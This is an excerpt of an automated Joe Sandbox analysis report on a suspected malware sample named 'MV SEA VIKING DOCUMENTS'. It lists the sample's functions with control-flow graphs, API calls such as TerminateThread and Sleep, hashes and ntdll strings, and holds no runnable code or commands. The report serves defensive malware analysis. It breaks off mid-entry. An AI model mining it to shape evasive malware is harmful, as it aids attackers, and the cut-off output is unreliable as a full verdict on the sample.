                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 13 1671001-16710cd TerminateThread 17 1671237-167124f 13->17 18 16710d3-16710dc 13->18 18->17 19 16710e2-16710e6 18->19 19->17 20 16710ec-16710f0 19->20 20->17 21 16710f6-16710fa 20->21 21->17 22 1671100-1671104 21->22 22->17 23 167110a-167110e 22->23 23->17 24 1671114-167114d 23->24 24->17 26 1671153-167116d 24->26 27 167116e-1671182 26->27 28 16711d5-167121f 27->28 29 1671184-1671188 27->29 32 1671221-1671232 28->32 33 167125b-167125f 28->33 29->17 31 167118e-16711d3 29->31 31->27 35 1671260-16712c6 33->35 37 16712c8-16712ca 35->37
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2764494173.0000000001671000.00000040.00000400.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1671000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: TerminateThread
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1852365436-0
                                                                                                                                                                                                                                • Opcode ID: 3e3424e5c8474d88d4dafebe0c5f296a63e99fb4286930168eb02a66765f3b3a
                                                                                                                                                                                                                                • Instruction ID: ac7370624dde194f0b33e4f7f8da0c4406a9d57dfcdd309c96b9c3ee7eae2b2b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e3424e5c8474d88d4dafebe0c5f296a63e99fb4286930168eb02a66765f3b3a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E3109746443018FDF258A388DA47B673A2AF53254F19C56FCCD98B2A6D73588CAC702
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0167100A Relevance: 1.6, APIs: 1, Instructions: 97threadCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 38 167100a-1671082 TerminateThread 40 1671089-16710cd 38->40 42 1671237-167124f 40->42 43 16710d3-16710dc 40->43 43->42 44 16710e2-16710e6 43->44 44->42 45 16710ec-16710f0 44->45 45->42 46 16710f6-16710fa 45->46 46->42 47 1671100-1671104 46->47 47->42 48 167110a-167110e 47->48 48->42 49 1671114-167114d 48->49 49->42 51 1671153-167116d 49->51 52 167116e-1671182 51->52 53 16711d5-167121f 52->53 54 1671184-1671188 52->54 57 1671221-1671232 53->57 58 167125b-167125f 53->58 54->42 56 167118e-16711d3 54->56 56->52 60 1671260-16712c6 58->60 62 16712c8-16712ca 60->62
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2764494173.0000000001671000.00000040.00000400.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1671000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: TerminateThread
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1852365436-0
                                                                                                                                                                                                                                • Opcode ID: 385dd0d6e9381175c3dfe08aa48839bb59f235b747b4cdd3017b8f60cea72e48
                                                                                                                                                                                                                                • Instruction ID: 4c6936a9c102a76de725625fb272c0e20fcec0fd0aaa36007961f171c91e5143
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 385dd0d6e9381175c3dfe08aa48839bb59f235b747b4cdd3017b8f60cea72e48
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF31A1B11883C69ACB128A68985EF6A7BF55F43A9CF1882DFDCC44B197C3275486C721
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F212B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 116 1f212b2a-1f212b2f 117 1f212b31-1f212b38 116->117 118 1f212b3f-1f212b46 LdrInitializeThunk 116->118
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 402e0ee67e6207d479b909a0e0e0d7658d5c84814b8e3a83fabd21269bb4a3db
                                                                                                                                                                                                                                • Instruction ID: 44b30297a3758cc19c5830feae17d512914fbe0746d6945a5836e1b747fe17c1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 402e0ee67e6207d479b909a0e0e0d7658d5c84814b8e3a83fabd21269bb4a3db
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9BB09B719054C6C7D711D760470870B798167D1701F66C456F1470A45E477CD191F176
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 01671528 Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2764494173.0000000001671000.00000040.00000400.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1671000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                                • Opcode ID: 2fa6a80d64854d65edf325f941324dc180794aa9d6c5f4d900e3ced40c02be2b
                                                                                                                                                                                                                                • Instruction ID: e9f4c60005e466794b134920f90a2922d2314a0ad68e3291924d14bf5aaff609
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2fa6a80d64854d65edf325f941324dc180794aa9d6c5f4d900e3ced40c02be2b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DBF074D11C83CA65D30686A8584FF2BBEF54F83D8CF2946CEEC812A09BC21B6042D730
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0167150C Relevance: 1.3, APIs: 1, Instructions: 24sleepCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2764494173.0000000001671000.00000040.00000400.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1671000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                                • Opcode ID: 42e26036b0a34961d7849b8ac4129106b693f3ca51819509f34a0dd42a3ebe04
                                                                                                                                                                                                                                • Instruction ID: 055432488d1dac487f4ade2119efebf427ce2c0453a03581d913ef2710548de8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42e26036b0a34961d7849b8ac4129106b693f3ca51819509f34a0dd42a3ebe04
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16E0D8F06203029FE7089F2888DCB5877535F06714FAAC456C9470B092D33188C6C611
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                Function 1F27FDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                                                                • API String ID: 3446177414-1700792311
                                                                                                                                                                                                                                • Opcode ID: 13b4cfb5ab6dece8d7373e402661fc2e597a1ef1817300812cd1088d395ffe48
                                                                                                                                                                                                                                • Instruction ID: 020b4b37d62d2b2d5e0e0eb1968de70a14f5dcbd4961a18f876c77e8d8721da8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 13b4cfb5ab6dece8d7373e402661fc2e597a1ef1817300812cd1088d395ffe48
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79D16535914786DFCB01CFA4C850AEEBBF1FF49310F148189E4489B692D73AB951DB51
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1FDA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                                                                                                • API String ID: 3446177414-3224558752
                                                                                                                                                                                                                                • Opcode ID: a1b91ccdfc353926c1ac0f525a25b5251e0cac8f194cd67fc51eab0ee97aab4e
                                                                                                                                                                                                                                • Instruction ID: 8c1fc74d7f5019961e8a5682620960135683f4cb4fa2bc54118a3c645811ab0a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1b91ccdfc353926c1ac0f525a25b5251e0cac8f194cd67fc51eab0ee97aab4e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 774199B4A10782DFC305CF24C994B9AB3B4FF44320F158669E6568B781C738F9A9D792
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1FDAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                                                                                                • API String ID: 3446177414-1222099010
                                                                                                                                                                                                                                • Opcode ID: eced59e398920f2cac8b429acf364d71a31da84290c0928f9e4d4d2e21ebef2d
                                                                                                                                                                                                                                • Instruction ID: a9d2ea029f9076ddfe72cdc2a4ddb1dfb133fed7229af81bade526ec81776816
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eced59e398920f2cac8b429acf364d71a31da84290c0928f9e4d4d2e21ebef2d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9531C8B5A107C4DFC312CF28C928F9A37E8FF06721F040589E4528BA91C77ABA78C611
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F204C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1F243439
                                                                                                                                                                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 1F24344A, 1F243476
                                                                                                                                                                                                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 1F243466
                                                                                                                                                                                                                                • LdrpFindDllActivationContext, xrefs: 1F243440, 1F24346C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                                                                • API String ID: 3446177414-3779518884
                                                                                                                                                                                                                                • Opcode ID: 103c9a495b3238811535d22c1186d0bdc1c56e2eb6330466370aade7698e6d2d
                                                                                                                                                                                                                                • Instruction ID: af2bc066a57d275d3eb8d1beb8ba73ddae7faaf2033a9da6d4475ff27c4f2a54
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 103c9a495b3238811535d22c1186d0bdc1c56e2eb6330466370aade7698e6d2d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05310773E12693BFEB21BB14C888FD5B2A4AB40364F22C16BE8055B550E7A5BD90C2D1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1F0AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 1F239F2E
                                                                                                                                                                                                                                • Failed to allocated memory for shimmed module list, xrefs: 1F239F1C
                                                                                                                                                                                                                                • LdrpCheckModule, xrefs: 1F239F24
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                • API String ID: 3446177414-161242083
                                                                                                                                                                                                                                • Opcode ID: 7eac390b3b564a3580d449574be0a183205ece98eb4fd75f42a1b372766b8734
                                                                                                                                                                                                                                • Instruction ID: aaa469701399b1b90d3701f67aa787c2903865c3dba8e85c65bd51655c9d8de6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7eac390b3b564a3580d449574be0a183205ece98eb4fd75f42a1b372766b8734
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B871E1B5E002069FDB04DF68C984AAEB7F1EF48308F5545ADE80AEB640E735BD65CB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F2AACEB Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                • Opcode ID: 691919fb8de60d068a92f283207e515e3845f8ec0f0e5f4c1496e630d0054982
                                                                                                                                                                                                                                • Instruction ID: f79cd27e0adb9caae3a64865ce76aafe3d51892d9e7bcbc90c454c1155f9f64f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 691919fb8de60d068a92f283207e515e3845f8ec0f0e5f4c1496e630d0054982
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21F1E972E006569FCB18CFA8C9906BDFBF5EF8830072A456DD4A6DB780E635E941CB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1FEE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 0f5fa2e084acae4302f13310d6189dde8e518ed4719e817baed2955939ed01cd
                                                                                                                                                                                                                                • Instruction ID: c28f4bd98bc93407fdb77221e8aebeb466456b35b19d8405ae89066a163e99e5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f5fa2e084acae4302f13310d6189dde8e518ed4719e817baed2955939ed01cd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5E126B0D00749CFCB25CFA9D984A8DBBF5FF48310F20466AE446A7661D7B1A85ACF50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F204B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 0$Flst
                                                                                                                                                                                                                                • API String ID: 0-758220159
                                                                                                                                                                                                                                • Opcode ID: 5de3712335f3a7fc1a557840346d2a0da3e9249551e332df82a34fdcdd9a66fb
                                                                                                                                                                                                                                • Instruction ID: b975e7943d2a00f6a8d90feb54084ba7ace4a4343324ffbe5b727589c4db7d9a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5de3712335f3a7fc1a557840346d2a0da3e9249551e332df82a34fdcdd9a66fb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87518BB2E0269A9FDB24DF95C584799FBF4EF44714F24C16AD0499F240E7B4A981CB80
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F2AA1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: HEAP:
                                                                                                                                                                                                                                • API String ID: 3446177414-2466845122
                                                                                                                                                                                                                                • Opcode ID: f6837c06a9e757679526cbe89a02dc373abc8a5431fab8b1852b6d308498c746
                                                                                                                                                                                                                                • Instruction ID: 22cc6d9443b0bd24ed0193968a9da5a44ebfa5b8ac29ad27b1f97132e133611a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6837c06a9e757679526cbe89a02dc373abc8a5431fab8b1852b6d308498c746
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21A19871A14712CFC704CE28C894A2ABBE5BF88710F154A6EE946DB710E776EC45CF91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F207550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • ExecuteOptions, xrefs: 1F2444AB
                                                                                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1F244460
                                                                                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1F244530
                                                                                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1F244507
                                                                                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 1F244592
                                                                                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1F24454D
                                                                                                                                                                                                                                • Execute=1, xrefs: 1F24451E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                                                                • Opcode ID: 718af56a76f54dd97c3c5378e2f290b8152159547910c8b20c827f0b4be2cc5a
                                                                                                                                                                                                                                • Instruction ID: a42d7e99c154fc1277e9c99d5d7cf00384027453259cd97c9cfa70d35b5cfee5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 718af56a76f54dd97c3c5378e2f290b8152159547910c8b20c827f0b4be2cc5a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D51F676A00319BADF14EFA4DC95FE977A8EF18310F2005A9E905A7590EB70FE458F60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1EA170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • SsHd, xrefs: 1F1EA304
                                                                                                                                                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1F2377E2
                                                                                                                                                                                                                                • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 1F2378F3
                                                                                                                                                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1F237807
                                                                                                                                                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 1F2377DD, 1F237802
                                                                                                                                                                                                                                • Actx , xrefs: 1F237819, 1F237880
                                                                                                                                                                                                                                Memory Dump Source
